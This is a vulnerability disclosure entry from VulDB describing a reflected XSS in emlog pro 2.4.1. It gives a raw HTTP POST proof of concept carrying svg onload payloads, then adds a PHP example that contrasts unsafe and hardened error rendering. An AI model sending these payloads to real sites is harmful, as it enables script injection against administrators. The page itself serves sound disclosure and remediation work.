Submit #462477: emlog emlog pro 2.4.1 Cross-Site Scripting (XSS)

Title: emlog emlog pro 2.4.1 Cross-Site Scripting (XSS)

Description:

Summary: A reflected Cross-Site Scripting (XSS) vulnerability exists in emlog pro 2.4.1 due to improper sanitization of the $msg parameter in /include/lib/common.php.

Details: This vulnerability can be exploited by an attacker to inject malicious scripts into the web application, which can then be executed in the browsers of other users. The vulnerability stems from improper filtering of SQL statement error messages in $msg.

POC: For example, in the /admin/navbar.php file, newtab expects data of integer type, and if it receives data of string type, it triggers an error. The error message can contain the entire SQL statement, and a reflected XSS vulnerability can occur if the SQL statement contains any field that accepts data passed in by the user. In the example, the naviname and url parameters are the incoming fields represented in the SQL statement.

    POST /admin/navbar.php?action=add HTTP/1.1
    Host: target-ip
    Content-Length: 75
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: [admins'cookie]
    Connection: keep-alive

    naviname=<svg%20onload=alert(1)>&url=<svg%20onload=alert(2)>&pid=0&newtab=hebing123

PS: Of course, newtab can trigger it by itself; just set it to <svg%20onload=alert(2)>

Source: https://github.com/emlog/emlog/issues/306
User: jiashenghe (UID 39445)
Submission: 12/13/2024 05:06 (2 years ago)
Moderation: 12/20/2024 13:36 (7 days later)
Status: Accepted
VulDB entry: 289081 [Emlog Pro up to 2.4.1 /include/lib/common.php msg cross site scripting]
Points: 20
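The pattern the submission describes, a database error message that embeds the failed SQL statement (and with it the user-supplied field values) being written into the HTML response unescaped, is shown below beside a hardened form. This is an added illustration written for this page; it is not emlog's code and does not reproduce /include/lib/common.php or /admin/navbar.php. The function names (renderErrorUnsafe, renderErrorSafe, parseNavbarInput, handleNavbarAdd), the $insertNavi callback and the sample error string are hypothetical; the sample request values are constructed to match the POC above.

```php
<?php
// Added illustration, not emlog's code. Models the flaw described in the submission:
// a DB error text that embeds the failed SQL (and thus request parameters) is echoed raw.
declare(strict_types=1);

// Vulnerable pattern (hypothetical): $msg goes into the page without output encoding,
// so any markup inside the failed SQL statement is rendered as HTML.
function renderErrorUnsafe(string $msg): string
{
    return '<div class="error">' . $msg . '</div>';
}

// Hardened pattern: encode on output, so the same text becomes inert.
function renderErrorSafe(string $msg): string
{
    return '<div class="error">' . htmlspecialchars($msg, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</div>';
}

// Validate types before the query runs: a non-integer newtab/pid is rejected here,
// so it never reaches the database and never produces an SQL error to display.
// filter_var returns false (not a cast) for a value such as "hebing123".
function parseNavbarInput(array $post): array
{
    $newtab = filter_var($post['newtab'] ?? '', FILTER_VALIDATE_INT);
    $pid    = filter_var($post['pid'] ?? '', FILTER_VALIDATE_INT);
    if ($newtab === false || $pid === false) {
        throw new InvalidArgumentException('newtab and pid must be integers');
    }
    return [
        'naviname' => (string)($post['naviname'] ?? ''),
        'url'      => (string)($post['url'] ?? ''),
        'pid'      => $pid,
        'newtab'   => $newtab,
    ];
}

// Hypothetical request handler: $insertNavi stands in for the real persistence call.
// Client-facing errors are generic and encoded; driver details go to the server log only.
function handleNavbarAdd(array $post, callable $insertNavi): string
{
    try {
        $row = parseNavbarInput($post);
        $insertNavi($row);
        return '<p>Navigation entry saved.</p>';
    } catch (InvalidArgumentException $e) {
        error_log('navbar add rejected: ' . $e->getMessage());
        return renderErrorSafe('Invalid input: ' . $e->getMessage());
    } catch (Throwable $e) {
        error_log('navbar add failed: ' . $e->getMessage()); // full SQL stays server-side
        return renderErrorSafe('Could not save the navigation entry.');
    }
}

// Constructed sample input modelled on the POST body in the submission.
$sample = [
    'naviname' => '<svg onload=alert(1)>',
    'url'      => '<svg onload=alert(2)>',
    'pid'      => '0',
    'newtab'   => 'hebing123',
];

// Constructed stand-in for a driver error that quotes the statement, as the submission describes.
$fakeSqlError = "SQL error near INSERT INTO navi (naviname, url) VALUES ('"
    . $sample['naviname'] . "', '" . $sample['url'] . "')";

echo renderErrorUnsafe($fakeSqlError), PHP_EOL; // tags survive intact: the browser executes them
echo renderErrorSafe($fakeSqlError), PHP_EOL;   // tags become &lt;svg ...&gt;: displayed as text
echo handleNavbarAdd($sample, function (array $row): void {}), PHP_EOL; // rejected before any SQL runs
```

Two independent controls are shown on purpose: output encoding at the point where $msg is rendered fixes the XSS regardless of where the text came from, while integer validation of newtab and pid removes the trigger by keeping type errors out of the database layer. Keeping the raw driver message in the server log rather than the response also stops the SQL statement itself from being disclosed to the client.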
